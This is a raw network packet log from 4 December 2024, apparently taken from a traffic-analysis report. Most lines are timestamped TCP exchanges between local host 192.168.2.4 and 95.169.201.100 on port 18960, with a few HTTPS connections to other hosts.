                                                                                                                                                      Dec 4, 2024 13:58:19.328748941 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.328821898 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.328897953 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.329459906 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.329539061 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.329696894 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.330092907 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.330173969 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.330586910 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.330892086 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.330981016 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.331077099 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.331808090 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.331875086 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.332015991 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.332525969 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.332720041 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.332782030 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.333250046 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.333369970 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.333408117 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.334078074 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.334180117 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.334222078 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.334834099 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.334945917 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.335038900 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.335629940 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.335750103 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.335917950 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.336504936 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.336582899 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.336646080 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.337223053 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.337357044 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.337419033 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.338125944 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.338243961 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.338313103 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.338825941 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.338913918 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.339387894 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.339623928 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.339755058 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.339792967 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.340419054 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.340511084 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.340661049 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.341213942 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.341321945 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.341367960 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.342015982 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.342204094 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.342255116 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.342921972 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.343044043 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.343092918 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.343732119 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.343893051 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.343940973 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.344491005 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.344582081 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.344646931 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.345221043 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.345303059 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.345360994 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.345993996 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.346107006 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.346287966 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.346849918 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.346982002 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.347027063 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.347724915 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.347935915 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.348046064 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.348727942 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.348926067 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.349165916 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.349488974 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.349641085 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.349690914 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.350156069 CET49754443192.168.2.4172.64.41.3
                                                                                                                                                      Dec 4, 2024 13:58:19.350200891 CET44349754172.64.41.3192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.350292921 CET49754443192.168.2.4172.64.41.3
                                                                                                                                                      Dec 4, 2024 13:58:19.350533009 CET49754443192.168.2.4172.64.41.3
                                                                                                                                                      Dec 4, 2024 13:58:19.350547075 CET44349754172.64.41.3192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.350645065 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.350815058 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.351011038 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.351495028 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.351599932 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.351777077 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.352103949 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.352214098 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.352260113 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.352699041 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.352829933 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.352880001 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.353624105 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.353753090 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.353892088 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.354327917 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.354427099 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.354469061 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.355000973 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.355092049 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.355237961 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.355515957 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.355633020 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.355684042 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.356307983 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.356448889 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.356503010 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.357146025 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.357261896 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.357321978 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.357969999 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.358144045 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.358221054 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.358686924 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.358809948 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.358894110 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.359560013 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.359707117 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.359877110 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.360337019 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.360441923 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.360577106 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.361141920 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.361280918 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.361324072 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.361901999 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.361979008 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.362067938 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.362687111 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.362781048 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.363081932 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.363531113 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.363624096 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.364279032 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.364331007 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.364383936 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.364485979 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.365098000 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.365222931 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.365868092 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.365921974 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.365952015 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.366758108 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.366847992 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.366900921 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.367666006 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.367775917 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.368060112 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.368261099 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.368359089 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.368788958 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.369079113 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.369185925 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.369386911 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.370012045 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.370111942 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.370182037 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.370667934 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.370819092 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.370872021 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.371471882 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.371545076 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.372222900 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.372272015 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.372347116 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.373040915 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.373146057 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.373189926 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.373814106 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.373924017 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.374619007 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.374661922 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.374707937 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.375024080 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.375433922 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.375540018 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.375612020 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.376194000 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.376322031 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.376449108 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.377001047 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.377125025 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.377170086 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.377826929 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.377948999 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.378191948 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.378871918 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.378882885 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.378962040 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.378969908 CET49741443192.168.2.420.12.23.50
                                                                                                                                                      Dec 4, 2024 13:58:19.379523993 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.379661083 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.379755020 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.380387068 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.380486965 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.380532026 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.381010056 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.381114960 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.381184101 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.381798983 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.381887913 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.381958961 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.382586956 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.382731915 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.383363008 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.383424044 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.383586884 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.384172916 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.384270906 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.384330988 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.384948969 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.385113955 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.385747910 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.385814905 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.385843992 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.386538029 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.386682034 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.386739016 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.388318062 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.388457060 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.388468027 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.388484001 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.388506889 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.388551950 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.388999939 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.389120102 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.389166117 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.389779091 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.389910936 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.390650034 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.390686035 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.390800953 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.391045094 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.391446114 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.391560078 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.392141104 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.392234087 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.392342091 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.392390013 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.396014929 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.396025896 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.396037102 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.396045923 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.396056890 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.396059036 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.396070957 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.396095991 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.396120071 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.396348000 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.396529913 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.396576881 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.397046089 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.397223949 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.397273064 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.397975922 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.398267984 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.398546934 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.398894072 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.399066925 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.399107933 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.399692059 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.399868965 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.400062084 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.400460958 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.400475979 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.400520086 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.401381016 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.401393890 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.401456118 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.401587963 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.401598930 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.401642084 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.401719093 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.401799917 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.402355909 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.402439117 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.402553082 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.402847052 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.403250933 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.403414965 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.403490067 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.404150963 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.404227972 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.404396057 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.404932022 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.404985905 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.405031919 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.405775070 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.405942917 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.405988932 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.406614065 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.406708956 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.406793118 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.407454014 CET189604973295.169.201.100192.168.2.4
